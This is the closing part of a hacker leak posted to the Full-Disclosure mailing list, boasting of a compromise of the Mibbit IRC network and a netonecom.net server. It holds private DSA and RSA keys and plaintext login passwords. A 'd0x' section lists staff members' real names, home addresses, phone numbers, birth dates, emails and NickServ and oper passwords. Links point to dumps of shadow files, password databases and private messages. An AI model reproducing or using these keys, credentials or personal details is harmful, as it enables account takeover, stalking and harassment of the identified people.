MIIDPwIBAAKCAQEA1KnQoLv0drmXUon9nIZUlXhQ7f6iMU0o5xlpbUg0Kwx5cXVB
mhn4gsr4CDk49+fYr29tuHn0NycY2lwuaMUV2yP15Pd05Wx/jgYgKTdaqZaZaIPX
OXbGAdFz3cd13g5pTAwDLblNp6gI4PlcXO/adN1ywOyLzVCmPHcBZqevPLMcL52v
b2ECeBuXKU5Z9leFoOF9IdkhZXTnsvj/yFLy8ZMpBD5JUyCXTfXw7cZZUko1X5wg
1lN76c+A0JKm0cMq8+NvA8ufRaGL2FXUv3McljrcTaRXMksWG3Z/KxEHsh3UY+pH
iNFESYED0jl4o84P6GLIxr7hlqQxpV0TyhwCiQIVALmyxXXqqqrEa83KyCyz557b
qdaLAoIBAQC3+GjuKabODKLSiRAgngwq88L1OJ45HtXyLIBudHLky0JM/nbUVx4f
coQip4jeLx17cMHK7Q/8gY13O81eQe8+IZ2De94PFL2troDsEW28R+7LOKcvidWp
+y2edoU77+/p2aLBUwmiYxlcmX1+w0iH/U/eMZUjtQJ6rawWFnaykBUazZjFNQdn
ZNusvxa4SKOf9Nx5qyXwSW52gqd1dNnrJFu0C10p3Y6ErllVwp5iUTAPPlOeGFnD
hoeu9FiLMVmJHzmiNDLCr6koBkEv+xQl6aL3DQRC7PymyYitltXTf1bf49kDrMWC
7BWuV3PD2pStnu1APfBALYI4DYplfO8MAoIBAQCRKSygD8aMdX83qgMCM6tphVun
snCtDZXhqLpx70aQvgZWoKYQLzdjdcicdSn9JtiWiUOzeS9A4ee5pizMwQOcbn1R
mnwIJe+36EwvCB1nhcwClGJz1ZFVR3JjMJAWob4LkYKnWPjvbLotjr1nMwCKyYRp
swTW1YZFfmodQkoPwdZ4dNKAyxxbLtWCL//l0WlTuzAfVTV4xxI/+BcfaxwW8O9W
XGj/dQwT8TjSqSUlJ2o5S6NX1tD0CmpfJ6JhcEIhAgcO2D2H15h+SZQCGkTB5Lx6
yI4A1msNuosa2+e8txxkoFZ/zIN2EdSqI5nkybOEpq971I8y1ieYtN0bH1MlAhRm
ovpJJvoWRqPg6WS+lyV49RWzMw==
-----END DSA PRIVATE KEY-----
-----BEGIN RSA PRIVATE KEY-----
MIIEoAIBAAKCAQEA43hMo7RV/7O4jNNzcGLrA2NA7kzA3RkcYnNw/lX2iJd0qR2n
a+GEySa/RtAbRRrxTDRgQ4H4LvrNGttoRIUS6gsMNpC4jxHUhzdYQikedNUNEA81
Ro7qMOULpRy9eoE0kntWIxyi5lpoSKR67KEkfhoChSe3ZEa0HqGumGWvhKJIdNtZ
Rd3GJc9HvzIr5rKxgmw4oQP9AHhhuwHTmVVLpkCI+eL8uemH+Bp8BHGNXZ4RtN50
oFB+09vtTfgCELYtAjZf6LQMCqdu6wLDx6VPxz1L6ukSoU6Oljka7Ktxjd9YR/ZU
dbmORCArArxW606rbLa9vspcWXpWBbNEwyiCXQIBIwKCAQBUfSPHxqOZfUSMFAZO
UKBu+PrcKyMQSyfMy8riH+3a9m0o3yDtjkdDZinJ2ESko5t0E3Q2VNiGemlwYB9p
6EjalmOfPRFZtipeG970AKTpkPY5KjhcCTJp7qyNyNip2DgZJn8UWxfvKOTnyBBm
hP7tAli1HWFfwn1qdpFOjCs/484Gryp0q+WFdrNrPJ1/8zqAUyqJj0cTXv6Pyeyl
RGkFmggFQgjhT/+rlrbqreMaiUMxUT2GjlvDNATrIydQVFyxIuF2El5lTVRWzV0m
rxTLTzxmZkgum+ANEC5pBNqGiTkPa2sCvRC3gtKmaZmFh6bv2/bbFOYCOEyHMfML
tQLPAoGBAPVaMLkmuQW+CUfGb+qCz/pHxDVG0Vj97GFgs1eIoskn5/3CSX9tkkTV
mKHQ3cFiV0QJWyy0MQOCTzC/yHPRj0DrZqsnOVufc1HVIADck1NKBVcXUyhRlbcB
1qW3IXeagr+lmZeVB+8WtM3oD9d8HY+Gvx+4O8ES9Am85kGfuQ8TAoGBAO1XcJBH
fVZ2mhzrvJlaLHwv730i6/hYPXphB3UYq48gfsRkhT4BbDBUiZ7201TbN7ZOHrX4
AqumdtayqYbdCLd0+6SDmAELsrAsMAM0JuvjsWXnR3a+i1T7D4Iay62c13UqFCae
PnIrqK/Qy0SRiNCbRPG4uM2PUS96Wjm1JabPAoGAfi5iM1W+PXetAFdswb+eKPG1
XTpdCTIhy64TFxMR48thXe7j+GQ8mG3Zd8qArJj5rfYu48piWZN5LwOLqUczuvy4
dUdfU7EWvF76hBmq2mCVCDfhn7Tt6Rbjayr7RNMeq7RAXJXJkOcbKBDyNE51mkVM
WXSxBDWiE6L6Ex7xdXcCgYA9B9sdyT18oiehCWsC3Kxacrns+lnvZyXAYhfcSCwd
fWJtA+e/fLVrg3PYa1rp7zo2MVharX0HkTSAWdPSONZbD3PoeZwdhqpKjwUII1p3
K+vJvyEBRvCg0tgaJCW+7dEA3u89IWCDwhVvCc3ebpDlLz2dPiDkZq557EMWJ0Qy
NQKBgFpovHwPC5k1bX9y2Sv7J+YgIiDgELsOxF9UQzWFzb1XCPczUA027RZTgLJX
ILQi0R8af8yCpxN3PUSQXtWwZXZMJZF9puFM2vXRe1Xd3kuZg4BEkoVtB5hYK5oE
yqzQAbROM2rLILM6Bj+zro5IApDQxJ4FokvNfhJm2JzdiSmo
-----END RSA PRIVATE KEY-----
jared@...ewinder.netonecom.net weJAruSE
http://www.2shared.com/file/-gqbHglO/jared.html (NicE priv8 keyz ;))
trix@...ewinder.netonecom.net trix4kids
molkmin -> jared: ah, you plan on lettingothers ssh in?
jared -> molkmin: no i thought you did
molkmin -> jared: hell no.
jared -> molkmin: okay well then forget what i said
molkmin -> jared: there are like 5 people that can ssh into sidewinder
molkmin -> jared: or maybe 7
jared -> molkmin: and only 2 of them are convicted felons
molkmin -> jared: I just recently secured SSH
jared -> molkmin: ahh so it won't allow IPs other than ours <<< You use open proxies too?
molkmin -> jared: got hacked..user used an account name of "test" password "test" <<< LOL
jared -> molkmin: grr
:: 0x06 - d0x ::
Axod
Name: Jimmy Moore
Location: Probably out of the UK
NickServ: axod:383cf3a3f7c2
Oper: axod:ce18da2ddae4
Email: jimmy.moore@...il.com
Email2: jimmy@...d.net
Email3: axod@...d.net
Email4: axodmedia@...il.com
Mugshot: http://a1.twimg.com/profile_images/71426235/Photo_175.jpg
http://bizzy.co.uk/uk/05956691/axod-media
http://twitter.com/#!/mibbit
http://twitter.com/#!/axod
http://digg.com/axod
http://axod.blogspot.com/
Azander
Name: Alanon Zander
Address: 2132 South 29 Rd Cadillac, MI 49601
NickServ: Azander:kikicat
Oper: azander:flagon3
Email: alanonzander@...il.com <<< kikicat
Email2: alanonzander@...oo.com <<< password recovery sends back to gmail LOL
https://plus.google.com/113170461621014873855/posts
http://www.myspace.com/alanonzander
http://user.netonecom.net/~azander/alanon.htm
Havvy
Name: Ryan Havvy
Age: 18?
Address: Somewhere in Washougal, WA
NickServ: Havvy:hmagic
Oper: havvy:hknight
Email: ryan.havvy@...il.com
http://twitter.com/#!/havvy
http://havvy.wordpress.com/
http://www.stumbleupon.com/stumbler/Havvy/
havvy havvy
xkcd.com/936/ Password security explained in a couple panels.
10 Aug ^^^ coming from someone whose passwords are 6 lowercase characters?? hahahah
Hercule
Name: Jürgen Wind
Location: Germany
NickServ: Hercule:herc47
Oper: hercule:0b2ac71dc51f
Email: jwind@....de
Joshua
Name: Joshua Luckers
Age: 23
DOB: 06/15/1988
NickServ: Joshua:TwEaKeRs
Oper: joshua:ec31e1a98607
Email: joshua@...siva.net
Mugshot:http://mediacdn.disqus.com/uploads/users/146/1862/avatar92.jpg
http://joshualuckers.nl/
Kitsune
Name: Todd Parker
Email: kitsune@...global.net
NickServ: Kitsune:undquiet
Oper: kitsune:$5T`mIb5705
http://nenolod.net/~nenolod/mibbit-debacle.html
Molkmin
Name: Thomas W Lyon
Age: 58
DOB: 06/04/1953
Address: 2188 US Highway 10 Sears, MI 49679-8073
NickServ: molkmin:sotw1btn
Oper: molkmin:ghotisotwbtn
Email: tlyon@...onecom.net
Email2: fxrocker@...il.com
Phone: 231-734-6144
http://www.netonecom.net
http://photobucket.com/home/molkmin <<< molkmin:sotw1btn
http://twitter.com/#!/molkmin <<< molkmin:sotw1btn
Pottsi
Name: Ian Potts
Age: 24
Location: Manchester, UK
NickServ: pottsi:digger
Email: pottsi@...tsi.com
Email2: ian1potts@....com
Email3: iantom90@...mail.co.uk
http://pottsi.com/
http://www.myspace.com/56242380
Sindacious
Name: James Clifton Newton
Age: 19
DOB: 05/06/1992
Address: 1506 Jenks Ave Panama City, FL 32405
Oper: sindacious:284adflgy343
Phone: 785-746-0322, 850-215-2518
Email: admin@...IRC.net
http://sindacio.us/
http://www.sindacious.com (It just redirects to sindacio.us)
http://twitter.com/sindacious
:: 0x07 - exit ::
>>> K1LL Th3 G1b50n!
attachm3nts >>>
n3t0nec0m shad0ws
m1rr0r 1: http://www.mediafire.com/file/mdlc4wibpacevv6/swshadow
m1rr0r 2: http://www.2shared.com/file/Axzg1umn/swshadow.html
w1k1 pass3s
m1rr0r 1: http://www.mediafire.com/?s9c9jtns5tp8oux
m1rr0r 2: http://www.2shared.com/file/pAg2gqyb/mibbitwiki.html
n1cks3rv pass3s
m1rr0r 1: http://www.mediafire.com/?g8hpr34ssu1ssdq
m1rr0r 2: http://www.2shared.com/document/TLTX8j3E/fullnspassdump.html
pMs
m1rr0r 1: http://www.2shared.com/file/Eq3cyC7f/mibbitpms.html
m1rr0r 2: http://tools.mibbit.com/mibbitpms.out :PppPpPPPPppppppp
cHaN msGs
http://www.2shared.com/file/5Kf08Z3-/mibbitchanmsgs.html
root@...ls:~# wall <<< "E0F"
Broadcast Message from root@...ls
(/dev/pts/3) at [redacted] ...
E0F
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists